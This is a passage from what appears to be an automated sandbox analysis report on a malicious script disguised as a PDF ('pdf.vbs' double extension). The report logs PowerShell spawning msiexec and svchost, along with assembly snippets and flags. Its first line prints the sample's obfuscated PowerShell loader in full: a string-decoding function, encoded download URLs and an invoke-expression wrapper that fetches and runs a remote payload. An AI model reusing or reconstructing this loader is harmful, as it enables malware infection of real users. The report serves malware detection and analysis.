                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Blodudtrdningen='Afhndede';;$noncooperator='Cryophorus';;$Thalassinian='Josephina';;$Maste193='Forslvendes';;$Downthrust=$host.Name; function Symboltabeller($blowtube){If ($Downthrust) {$Morphogenic='Ukammerater';$overstegne=2;$Smugleriernes=$overstegne}do{$Usaglige+=$blowtube[$Smugleriernes];$Smugleriernes+=3} until(!$blowtube[$Smugleriernes])$Usaglige}function cleavingly($Ethnicon){ .($Gudmors) ($Ethnicon)}$Medioanterior=Symboltabeller 'ben EExtTw.F W';$Medioanterior+=Symboltabeller 'ReeUnbLacb,lO,i keBrn FT';$Forstdelsernes=Symboltabeller 'RyM Ro Dz.riOpl,alDeaAm/';$Udlodning=Symboltabeller 'P T.klBls F1Se2';$Rival='N [,in Be STTr.FjSasE MRGivmoISaCNeE MPBeO CIBoNAnTTiME a lnEdApaGDoEcor,l] : D: Ss eMoc u KrS i TtSaYFoPB.R SO t po BCKlO,rlF =Vu$ US DDuld Oped eN,eI dNNiG';$Forstdelsernes+=Symboltabeller 'Mo5S .No0Mo t(TiWImi.on Pd oAvwDosO. lyNChTF. p1 e0Me.Af0K,;Ap CoWT iMinSn6 4F ; Unx,a6 u4Ac; l FarGrvGa:.e1ab3U 1In.S 0 F)La LoGU,e KcHokIno l/.u2Sh0 e1Un0Ha0me1 f0Sa1 i KeFIdi ArGre rf Jo nx L/T 1,a3Ac1Ca. ,0';$Hoejkulturer=Symboltabeller ' DUansGnEB RTi- AUdg ,E oN .t';$Eliksirers=Symboltabeller '.oh pt tc,pAnsPl:fe/Ni/ChwInw hwD . atUndSkeSij .bDe.Chc ho Am ./Exew fSk/ STokPriSlf tP eP r nn xeT .ScsChe ea E>Unh FtD,t Np she:Fl/.l/,iw SwBew .O a,krGeeMrcseo ksA aFolaud GaGatAnu SrMie,e.Spi Kt ./ SeEnfPf/ RS.ekEtiInfSutMeeH.r,anAmeAd.V sAne Ia';$Programmeringsskik1=Symboltabeller 'A >';$Gudmors=Symboltabeller ' BIC eH x';$Strudsmaven='Circumscript';$Fastprissystemet='\Even.Lar';cleavingly (Symboltabeller '.a$EsGA.LEpOArbLaaKaL e: ai GoVeD fi Sn .ETrs B=A,$StEBrNU vAp:EmaB pMaPMedC a TT aGu+S $ FE,ABes TSepSirFoiges.es,uYTis.mT teO mS.EK,t');cleavingly (Symboltabeller ' C$anG oLKvOHaBRoa LKv:SpVK A .aPabLoeReNBoFRuATeBDeR AiStKDy=Pr$ rESolazI dKT,S kISkRUnE .R FSCh.SaSnePPrLOpiTetRa( a$AnPSyr rOUbGVirFuaViM.aMSkeFor ei oND.G WSM sR kPriHekTe1 ,)');cleavingly (Symboltabeller $Rival);$Eliksirers=$Vaabenfabrik[0];$portor=(Symboltabeller 'Re$PrG,tLNeoW,BS.AP lF,:.aAFrTDiENol I ,e kR .v eiDeN FdWhUmeER = aNU eNyWIn- koTrbStj,yEBrcMiTDe BesRyy oS.ttr.eA mKa. i$ Bm leLyd SIRaoUlApenA.T eeDir itho r');cleavingly ($portor);cleavingly (Symboltabeller 'S $.iaVitBaeMilMiitoeWirInvEgiUnnTidDuuPae e. HS eS a dpreScr ,s S[Wu$VrHRuo,pe jH,kscu ul ktHyuenrU eD r e].r=An$PlFP oBirPasAdtKad.be ElBisA eNerL nTeeFus');$Pastina=Symboltabeller 'Ve$Sea etT,e ll oi,oeMirRuvKaiMin TdOpu aeSk. fD Uo wOpn Cl,ioDeaL d KF,ei el SeD (Bo$SaEFel li,ikNas Ei nr DeCorBesbe,In$ SBotFieM.mFin Pi bnDdg osH.fApu PlLedObtOt)';$Stemningsfuldt=$Iodines;cleavingly (Symboltabeller 'Sm$ AGK.lAnOC,bG.A.rl u:AfW IeMoe ukMdeChN eD HUS DseFAal,ru gRetUnEHar Tn fe IS t= E(erTC E SUnTp -Alp rAO,TFohC Vi$,rS nTKie SM Bn aIUnnEggFis.oFwaur LAfd T.a)');while (!$Weekendudflugternes) {cleavingly (Symboltabeller ' G$GegHelB,o ,b a KlAn:TrF,no DeJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B7900AD pushad ; iretd 1_2_00007FFD9B7900C1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD9B7800AD pushad ; iretd 6_2_00007FFD9B7800C1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD9B8540D9 push ebx; iretd 6_2_00007FFD9B8540DA
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_09033975 push ebx; retf 11_2_09033995
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_0903418C push FFFFFFF9h; retf 11_2_09034192
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_0903CDE6 push edx; retf 11_2_0903CDE8
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_090339E5 push ebx; retf 11_2_09033995
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_0903CF44 push eax; ret 11_2_0903CF4A
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_09036368 push ds; ret 11_2_09036369
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_090363AE push 0000001Ch; iretd 11_2_090363B0
                        Source: C:\Windows\SysWOW64\msiexec.exeCode function: 19_3_03D2CDE6 push edx; retf 19_3_03D2CDE8
                        Source: C:\Windows\SysWOW64\msiexec.exeCode function: 19_3_03D239E5 push ebx; retf 19_3_03D23995
                        Source: C:\Windows\SysWOW64\msiexec.exeCode function: 19_3_03D2418C push FFFFFFF9h; retf 19_3_03D24192
                        Source: C:\Windows\SysWOW64\msiexec.exeCode function: 19_3_03D263AE push 0000001Ch; iretd 19_3_03D263B0
                        Source: C:\Windows\SysWOW64\msiexec.exeCode function: 19_3_03D2CF44 push eax; ret 19_3_03D2CF4A
                        Source: C:\Windows\SysWOW64\msiexec.exeCode function: 19_3_03D23975 push ebx; retf 19_3_03D23995
                        Source: C:\Windows\SysWOW64\msiexec.exeCode function: 19_3_03D26368 push ds; ret 19_3_03D26369
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 20_3_005E225D push eax; ret 20_3_005E225F
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 20_3_005E6012 push 00000038h; iretd 20_3_005E601D
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 20_3_005E5606 pushad ; retf 20_3_005E5619
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 20_3_005E18C0 push ebp; retf 20_3_005E18C1
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 20_3_005E28ED push ebx; ret 20_3_005E28E4
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 20_3_005E588E push eax; iretd 20_3_005E589D
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 20_3_005E58BC pushad ; ret 20_3_005E58C1
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 20_3_005E1179 push FFFFFF82h; iretd 20_3_005E117B
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 20_3_005E5F0C push es; iretd 20_3_005E5F0D
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 20_3_005E4920 push 0000002Eh; iretd 20_3_005E4922
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 20_3_005E5FEE push FFFFFFD2h; retf 20_3_005E6011
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 20_3_005E0FEA push eax; ret 20_3_005E0FF5
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 20_3_005E278B push ebx; ret 20_3_005E28E4
                        Source: C:\Windows\System32\dllhost.exeCode function: 26_2_0000025C3F5D0466 push es; retf 26_2_0000025C3F5D046F

                        Hooking and other Techniques for Hiding and Protection

                        barindex
                        Uses an obfuscated file name to hide its real file extension (double extension)
                        Source: Possible double extension: pdf.vbsStatic PE information: List of required items and services.pdf.vbs
                        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
